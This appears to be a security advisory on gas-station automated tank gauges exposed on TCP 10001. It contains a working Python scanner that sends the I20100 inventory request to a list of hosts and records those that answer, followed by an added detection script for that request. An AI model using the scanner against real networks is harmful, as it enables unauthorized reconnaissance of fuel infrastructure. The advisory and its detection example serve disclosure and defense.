Automated Tank Gauge (ATG) Remote Configuration Disclosure

In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 publicly accessible gas station Automated Tank Gauges (ATGs). Besides monitoring for leakage, these systems gauge fluid levels and tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are used by nearly every fueling station in the United States and by tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators commonly map the ATG serial interface to an internet-facing TCP port (generally TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.

Packet Storm
```python
#!/usr/bin/env python3
import socket
import time

port = 10001
search_str = 'IN-TANK INVENTORY'
# SOH (0x01) followed by the function code I20100 and a newline
msg = str('\x01' + 'I20100' + '\n').encode('ascii')

# Input file: one host per line
with open("/tmp/ATG_SCAN.txt", 'r') as atg_file:
    for line in atg_file.read().splitlines():
        try:
            # The with block closes the socket on every path, including errors
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as atg_socket:
                atg_socket.connect((line, port))
                atg_socket.send(msg)
                time.sleep(.25)
                response = atg_socket.recv(1024).decode()
            # Record hosts whose reply contains the inventory report banner
            if search_str in response:
                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
                    file2.write(line + "\t ->\tATG Device\n")
        except (OSError, UnicodeDecodeError):
            # Unreachable host or non-text reply: move on to the next line
            pass
```
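For operators, the request described above is a usable detection signature: the SOH byte followed by `I20100`, sent to TCP 10001. The following is an added example, not part of the original advisory or its author's code; it flags that request in flow records when it comes from outside an allowlist and marks sources that query several gauges. The allowlisted network, the sweep threshold, the record layout and the sample records are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

ATG_PORT = 10001                     # port named in the advisory
INVENTORY_REQUEST = b"\x01I20100"    # SOH + function code from the advisory's script

# Assumption: networks the legitimate monitoring service polls from.
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed sample records: (source IP, destination IP, dest port, first payload bytes)
SAMPLE_FLOWS = [
    ("10.20.5.9",    "192.0.2.10", 10001, b"\x01I20100\n"),        # allowlisted poller
    ("203.0.113.77", "192.0.2.10", 10001, b"\x01I20100\n"),
    ("203.0.113.77", "192.0.2.11", 10001, b"\x01I20100\n"),
    ("203.0.113.77", "192.0.2.12", 10001, b"\x01I20100\n"),
    ("198.51.100.4", "192.0.2.10", 10001, b"GET / HTTP/1.1\r\n"),  # not an ATG query
    ("198.51.100.8", "192.0.2.11", 443,   b"\x01I20100\n"),        # not the ATG port
    ("198.51.100.9", "192.0.2.12", 10001, b"\x01I20100\n"),
]

def is_allowed(src):
    """True if the source address falls inside an allowlisted network."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in ALLOWED_NETS)

def find_unauthorized_queries(flows, sweep_threshold=3):
    """Map each non-allowlisted source that sent the inventory request to the
    gauges it queried; 'sweep' is True at sweep_threshold or more gauges."""
    targets = defaultdict(set)
    for src, dst, dport, payload in flows:
        if dport != ATG_PORT or not payload.startswith(INVENTORY_REQUEST):
            continue
        if is_allowed(src):
            continue
        targets[src].add(dst)
    return {
        src: {"targets": sorted(dsts), "sweep": len(dsts) >= sweep_threshold}
        for src, dsts in targets.items()
    }

if __name__ == "__main__":
    for src, info in find_unauthorized_queries(SAMPLE_FLOWS).items():
        kind = "sweep" if info["sweep"] else "single query"
        print(f"{src}: {kind} against {', '.join(info['targets'])}")
```

Any hit from a non-allowlisted source also means the gauge's serial interface is reachable from that network, which is the exposure the advisory describes.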
